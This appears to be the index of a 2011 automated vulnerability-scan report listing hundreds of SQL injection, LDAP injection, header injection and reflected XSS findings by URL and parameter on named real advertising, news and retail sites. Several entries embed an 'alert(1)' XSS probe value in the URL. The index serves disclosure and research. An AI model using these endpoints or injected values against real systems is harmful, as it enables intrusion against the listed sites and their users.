XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05102011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 10 12:59:28 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://ad.amgdgt.com/ads/ [ID cookie]

1.2. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [sz parameter]

1.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [name of an arbitrarily supplied request parameter]

1.4. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [sz parameter]

1.5. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_eo parameter]

1.6. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [name of an arbitrarily supplied request parameter]

1.7. http://ads2.adbrite.com/v0/ad [zs parameter]

1.8. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [FFChanCap cookie]

1.9. http://imp.fetchback.com/serve/fb/imp [name of an arbitrarily supplied request parameter]

1.10. http://map.media6degrees.com/orbserv/hbjs [rdrlst cookie]

1.11. http://map.media6degrees.com/orbserv/hbpix [User-Agent HTTP header]

1.12. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 3]

1.13. http://q1.checkm8.com/adam/detected [JE parameter]

1.14. http://q1.checkm8.com/adam/detected [WIDTH parameter]

1.15. http://q1.checkm8.com/adam/detected [cat parameter]

1.16. http://q1.checkm8.com/adam/detected [req parameter]

1.17. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

1.18. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

1.19. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]

1.20. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]

1.21. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]

1.22. http://www.facebook.com/plugins/facepile.php [datr cookie]

1.23. http://www.facebook.com/plugins/likebox.php [datr cookie]

1.24. http://www.facebook.com/plugins/recommendations.php [datr cookie]

1.25. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 2]

1.26. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 3]

1.27. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 2]

1.28. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [REST URL parameter 8]

1.29. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://a.tribalfusion.com/j.ad [p parameter]

2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

2.3. http://data.cmcore.com/imp [ci parameter]

2.4. http://map.media6degrees.com/orbserv/hbjs [vstcnt cookie]

2.5. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 1]

2.6. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]

2.7. http://www.google.com/uds/GnewsSearch [sig parameter]

3. HTTP header injection

3.1. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 1]

3.2. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 2]

3.3. http://ad.doubleclick.net/ad/N3671.277003.NETSHELTER/B5398653.20 [REST URL parameter 1]

3.4. http://ad.doubleclick.net/ad/N4478.netshelter.netOX2611/B5176383.13 [REST URL parameter 1]

3.5. http://ad.doubleclick.net/ad/N5371.131643.MEEBO.COM/B5369958.2 [REST URL parameter 1]

3.6. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]

3.7. http://ad.doubleclick.net/ad/q1.philly/news [REST URL parameter 1]

3.8. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2 [REST URL parameter 1]

3.9. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [REST URL parameter 1]

3.10. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3 [REST URL parameter 1]

3.11. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6 [REST URL parameter 1]

3.12. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [REST URL parameter 1]

3.13. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]

3.14. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [REST URL parameter 1]

3.15. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [REST URL parameter 1]

3.16. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13 [REST URL parameter 1]

3.17. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]

3.18. http://ad.doubleclick.net/adj/N5776.126265.CASALEMEDIA/B5120103.7 [REST URL parameter 1]

3.19. http://ad.doubleclick.net/adj/contentnext.ilm/paid [REST URL parameter 1]

3.20. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]

3.21. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]

3.22. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain [REST URL parameter 1]

3.23. http://ad.doubleclick.net/adj/ns.androidcentral/general/archive [REST URL parameter 1]

3.24. http://ad.doubleclick.net/adj/ph.admin/adsense [REST URL parameter 1]

3.25. http://ad.doubleclick.net/adj/ph.admin/register [REST URL parameter 1]

3.26. http://ad.doubleclick.net/adj/ph.mobile/adsense [REST URL parameter 1]

3.27. http://ad.doubleclick.net/adj/ph.news/adsense [REST URL parameter 1]

3.28. http://ad.doubleclick.net/adj/ph.news/nation_world [REST URL parameter 1]

3.29. http://ad.doubleclick.net/adj/q1.philly/news [REST URL parameter 1]

3.30. http://ad.doubleclick.net/adj/zdgeek.dart/geek-cetera [REST URL parameter 1]

3.31. http://ad.doubleclick.net/pfadx/philly_cim/ [dcove parameter]

3.32. http://ad.doubleclick.net/pfadx/philly_cim/ [name of an arbitrarily supplied request parameter]

3.33. http://ad.doubleclick.net/pfadx/philly_cim/ [secure parameter]

3.34. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

3.35. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

3.36. http://bidder.mathtag.com/iframe/notify [exch parameter]

3.37. http://bidder.mathtag.com/notify [exch parameter]

3.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.39. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.41. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]

3.42. http://c7.zedo.com/utils/ecSet.js [v parameter]

3.43. http://d.xp1.ru4.com/activity [redirect parameter]

3.44. http://politics.gather.com/js/commenting.js [REST URL parameter 2]

3.45. http://politics.gather.com/js/siteReport.js.jspf [REST URL parameter 2]

3.46. http://politics.gather.com/viewArticle.action [REST URL parameter 1]

3.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

3.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/ad/q1.philly/news [REST URL parameter 1]

4.2. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 2]

4.3. http://a.collective-media.net/adj/idgt.slashgear/article_above [REST URL parameter 3]

4.4. http://a.collective-media.net/adj/idgt.slashgear/article_above [name of an arbitrarily supplied request parameter]

4.5. http://a.collective-media.net/adj/idgt.slashgear/article_above [sec parameter]

4.6. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 2]

4.7. http://a.collective-media.net/adj/ns.androidcentral/general [REST URL parameter 3]

4.8. http://a.collective-media.net/adj/ns.androidcentral/general [name of an arbitrarily supplied request parameter]

4.9. http://a.collective-media.net/adj/ns.androidcentral/general [ppos parameter]

4.10. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 2]

4.11. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 3]

4.12. http://a.collective-media.net/adj/ns.androidcentral/general/archive [REST URL parameter 4]

4.13. http://a.collective-media.net/adj/ns.androidcentral/general/archive [name of an arbitrarily supplied request parameter]

4.14. http://a.collective-media.net/adj/ns.androidcentral/general/archive [ppos parameter]

4.15. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 2]

4.16. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 3]

4.17. http://a.collective-media.net/adj/ns.knowyourmobile/general [name of an arbitrarily supplied request parameter]

4.18. http://a.collective-media.net/adj/ns.knowyourmobile/general [ppos parameter]

4.19. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 2]

4.20. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 3]

4.21. http://a.collective-media.net/adj/ns.slashgear/general [name of an arbitrarily supplied request parameter]

4.22. http://a.collective-media.net/adj/ns.slashgear/general [ppos parameter]

4.23. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 2]

4.24. http://a.collective-media.net/adj/q1.philly/news [REST URL parameter 3]

4.25. http://a.collective-media.net/adj/q1.philly/news [name of an arbitrarily supplied request parameter]

4.26. http://a.collective-media.net/adj/q1.philly/news [sz parameter]

4.27. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 1]

4.28. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 2]

4.29. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [REST URL parameter 3]

4.30. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [sec parameter]

4.31. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 1]

4.32. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 2]

4.33. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 3]

4.34. http://a.collective-media.net/cmadj/ns.androidcentral/general [ppos parameter]

4.35. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 1]

4.36. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 2]

4.37. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 3]

4.38. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 4]

4.39. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [ppos parameter]

4.40. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 1]

4.41. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 2]

4.42. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 3]

4.43. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [ppos parameter]

4.44. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 1]

4.45. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 2]

4.46. http://a.collective-media.net/cmadj/ns.slashgear/general [REST URL parameter 3]

4.47. http://a.collective-media.net/cmadj/ns.slashgear/general [ppos parameter]

4.48. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 1]

4.49. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 2]

4.50. http://a.collective-media.net/cmadj/q1.philly/news [REST URL parameter 3]

4.51. http://a.collective-media.net/cmadj/q1.philly/news [sz parameter]

4.52. http://ad.bnmla.com/serve [cid parameter]

4.53. http://ad.bnmla.com/serve [click parameter]

4.54. http://ad.bnmla.com/serve [click parameter]

4.55. http://ad.bnmla.com/serve [pid parameter]

4.56. http://ad.bnmla.com/serve [zid parameter]

4.57. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

4.58. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]

4.59. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

4.60. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

4.61. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]

4.62. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]

4.63. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sz parameter]

4.64. http://ad.doubleclick.net/adi/N5371.media6/B5451956.2 [sz parameter]

4.65. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_a parameter]

4.66. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_d parameter]

4.67. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_eo parameter]

4.68. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_et parameter]

4.69. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_o parameter]

4.70. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_pm parameter]

4.71. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_pn parameter]

4.72. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [_s parameter]

4.73. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [redirect parameter]

4.74. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [sz parameter]

4.75. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_a parameter]

4.76. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_d parameter]

4.77. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_eo parameter]

4.78. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_et parameter]

4.79. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_o parameter]

4.80. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_pm parameter]

4.81. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_pn parameter]

4.82. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [_s parameter]

4.83. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [redirect parameter]

4.84. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [sz parameter]

4.85. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [_ct parameter]

4.86. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [_ct parameter]

4.87. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [action parameter]

4.88. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [action parameter]

4.89. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [adid parameter]

4.90. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [adid parameter]

4.91. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [publisherid parameter]

4.92. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [publisherid parameter]

4.93. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [sz parameter]

4.94. http://ad.doubleclick.net/adj/N4568.ADCONION/B5119479.6 [sz parameter]

4.95. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

4.96. http://ad.media6degrees.com/adserv/cs [tId parameter]

4.97. http://ad.media6degrees.com/adserv/csst [adType parameter]

4.98. http://ad.media6degrees.com/adserv/csst [adType parameter]

4.99. http://ad.media6degrees.com/adserv/csst [adurl parameter]

4.100. http://ad.media6degrees.com/adserv/csst [adurl parameter]

4.101. http://ad.media6degrees.com/adserv/csst [ai parameter]

4.102. http://ad.media6degrees.com/adserv/csst [ai parameter]

4.103. http://ad.media6degrees.com/adserv/csst [client parameter]

4.104. http://ad.media6degrees.com/adserv/csst [client parameter]

4.105. http://ad.media6degrees.com/adserv/csst [num parameter]

4.106. http://ad.media6degrees.com/adserv/csst [num parameter]

4.107. http://ad.media6degrees.com/adserv/csst [sig parameter]

4.108. http://ad.media6degrees.com/adserv/csst [sig parameter]

4.109. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.110. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.111. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.112. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

4.113. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

4.114. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.115. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.116. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

4.117. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

4.118. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

4.119. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.120. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.121. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.122. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

4.123. http://ads.trove.com/RevenuePlatform/ad/pong [&callback parameter]

4.124. http://ads.trove.com/RevenuePlatform/ad/pong [ads%5Brev_ad1%5D%5Bfinder%5D parameter]

4.125. http://ads.trove.com/RevenuePlatform/ad/pong [ads%5Brev_ad2%5D%5Bfinder%5D parameter]

4.126. http://ads.trove.com/RevenuePlatform/ad/pong [url parameter]

4.127. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

4.128. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.129. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

4.130. http://adsfac.us/ag.asp [cc parameter]

4.131. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

4.132. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

4.133. http://ar.voicefive.com/b/rc.pli [func parameter]

4.134. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.135. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.136. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.137. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.138. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.139. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.140. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.141. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.142. http://bid.openx.net/json [c parameter]

4.143. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

4.144. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

4.145. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

4.146. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

4.147. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]

4.148. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]

4.149. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [q parameter]

4.150. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [q parameter]

4.151. http://cdn.shoutlet.com/service/shoutletshare/worker [loc parameter]

4.152. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6 [mpt parameter]

4.153. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6 [mpvc parameter]

4.154. http://cdn4.eyewonder.com/content/0/10295/119241/NetShelternet-728-90-ATM_COVERAGE_728x90_v1_r1-Banner-1438824.js [mpck parameter]

4.155. http://cdn4.eyewonder.com/content/0/10295/119241/NetShelternet-728-90-ATM_COVERAGE_728x90_v1_r1-Banner-1438824.js [mpvc parameter]

4.156. http://choices.truste.com/ca [c parameter]

4.157. http://choices.truste.com/ca [h parameter]

4.158. http://choices.truste.com/ca [plc parameter]

4.159. http://choices.truste.com/ca [w parameter]

4.160. http://choices.truste.com/ca [zi parameter]

4.161. http://d.tradex.openx.com/afr.php [cb parameter]

4.162. http://d.tradex.openx.com/afr.php [loc parameter]

4.163. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

4.164. http://d.tradex.openx.com/afr.php [zoneid parameter]

4.165. http://delivery.uat.247realmedia.com/RealMedia/ads/adstream_sx.ads/zama/728x90 [REST URL parameter 4]

4.166. http://delivery.uat.247realmedia.com/RealMedia/ads/adstream_sx.ads/zama/728x90 [REST URL parameter 5]

4.167. http://digg.com/tools/services [REST URL parameter 1]

4.168. http://digg.com/tools/services [REST URL parameter 2]

4.169. http://digg.com/tools/services [callback parameter]

4.170. http://digg.com/tools/services [name of an arbitrarily supplied request parameter]

4.171. http://ds.addthis.com/red/psi/sites/store.androidcentral.com/p.json [callback parameter]

4.172. http://echoapi.washingtonpost.com/v1/count [q parameter]

4.173. http://echoapi.washingtonpost.com/v1/search [q parameter]

4.174. http://event.adxpose.com/event.flow [uid parameter]

4.175. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [PluID parameter]

4.176. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 2]

4.177. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 3]

4.178. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 4]

4.179. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 5]

4.180. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 6]

4.181. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [c parameter]

4.182. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [cn parameter]

4.183. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [h parameter]

4.184. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

4.185. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [ncu parameter]

4.186. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [ord parameter]

4.187. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [pli parameter]

4.188. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [ucm parameter]

4.189. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [w parameter]

4.190. http://gather.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.191. http://geek.us.intellitxt.com/al.asp [jscallback parameter]

4.192. http://geek.us.intellitxt.com/iframescript.jsp [src parameter]

4.193. http://geek.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.194. http://geek.us.intellitxt.com/v4/init [jscallback parameter]

4.195. http://geek.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.196. http://ib.adnxs.com/ab [click parameter]

4.197. http://ib.adnxs.com/ab [cnd parameter]

4.198. http://ib.adnxs.com/ab [custom_macro parameter]

4.199. http://ib.adnxs.com/ab [pixel parameter]

4.200. http://ib.adnxs.com/if [cnd parameter]

4.201. http://id.expressnightout.com/identity/public/visitor.json [jsonp_callback parameter]

4.202. http://id.slate.com/identity/public/visitor.json [jsonp_callback parameter]

4.203. http://id.theroot.com/identity/public/visitor.json [jsonp_callback parameter]

4.204. http://id.trove.com/identity/public/visitor.json [jsonp_callback parameter]

4.205. http://id.washingtonpost.com/identity/public/visitor/create [jsonp_callback parameter]

4.206. http://id.washingtonpost.com/identity/public/visitor/instance_datum.json [attributeValue parameter]

4.207. http://id.washingtonpost.com/identity/public/visitor/instance_datum.json [jsonp_callback parameter]

4.208. http://id.washingtonpost.com/identity/public/visitor/ip_address.json [jsonp_callback parameter]

4.209. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

4.210. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

4.211. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpck parameter]

4.212. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpck parameter]

4.213. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpvc parameter]

4.214. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html [mpvc parameter]

4.215. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

4.216. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

4.217. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

4.218. http://js.revsci.net/gateway/gw.js [csid parameter]

4.219. http://knowyourmobile.uk.intellitxt.com/al.asp [jscallback parameter]

4.220. http://knowyourmobile.uk.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.221. http://knowyourmobile.uk.intellitxt.com/v4/init [jscallback parameter]

4.222. http://knowyourmobile.uk.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.223. http://media3.washingtonpost.com/wpost/js/combo [context parameter]

4.224. http://mm.chitika.net/minimall [callback parameter]

4.225. http://pglb.buzzfed.com/10032/5aa834d4bb2efeab1df676685da0518c [callback parameter]

4.226. http://r.turn.com/server/pixel.htm [fpid parameter]

4.227. http://r.turn.com/server/pixel.htm [sp parameter]

4.228. http://s26.sitemeter.com/js/counter.asp [site parameter]

4.229. http://s26.sitemeter.com/js/counter.js [site parameter]

4.230. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]

4.231. http://samsungsmarttvs.netshelter.net/fixed_placement.js.php [publisher parameter]

4.232. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php [name of an arbitrarily supplied request parameter]

4.233. http://samsungsmarttvs.netshelter.net/video_fixed_placement.js.php [publisher parameter]

4.234. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 2]

4.235. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 2]

4.236. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]

4.237. https://secure.smartphoneexperts.com/content/customercare/page-status.htm [REST URL parameter 3]

4.238. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 2]

4.239. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 3]

4.240. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 4]

4.241. https://secure.smartphoneexperts.com/content/customercare6eabd%22-alert(1)-%222ec977d129/images/androidcentral/ab_test_11/ac_hero_bg2.jpg [REST URL parameter 5]

4.242. http://seg.sharethis.com/partners.php [partner parameter]

4.243. http://slashphone.us.intellitxt.com/al.asp [jscallback parameter]

4.244. http://slashphone.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

4.245. http://slashphone.us.intellitxt.com/v4/init [jscallback parameter]

4.246. http://slashphone.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

4.247. http://store.androidcentral.com/belkin-headphone-splitter-y-adapter/11A75A6767.htm [REST URL parameter 2]

4.248. http://store.androidcentral.com/cart.htm [REST URL parameter 1]

4.249. http://store.androidcentral.com/content/customercare/index.htm [REST URL parameter 2]

4.250. http://store.androidcentral.com/content/customercare/index.htm [REST URL parameter 3]

4.251. http://store.androidcentral.com/content/customercare/page-shipping.htm [REST URL parameter 2]

4.252. http://store.androidcentral.com/content/customercare/page-shipping.htm [REST URL parameter 3]

4.253. http://store.androidcentral.com/external_marketing/js_a_v1.php [width parameter]

4.254. http://store.androidcentral.com/jabra-bt2080-bluetooth-headset/9A32A5717.htm [REST URL parameter 2]

4.255. http://tag.admeld.com/ad/json [callback parameter]

4.256. http://tag.admeld.com/ad/json [container parameter]

4.257. http://tag.admeld.com/ad/json [placement parameter]

4.258. http://tag.admeld.com/ad/json [site_id parameter]

4.259. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.260. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.261. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.262. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.263. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.264. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.265. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.266. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.267. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js [&ak parameter]

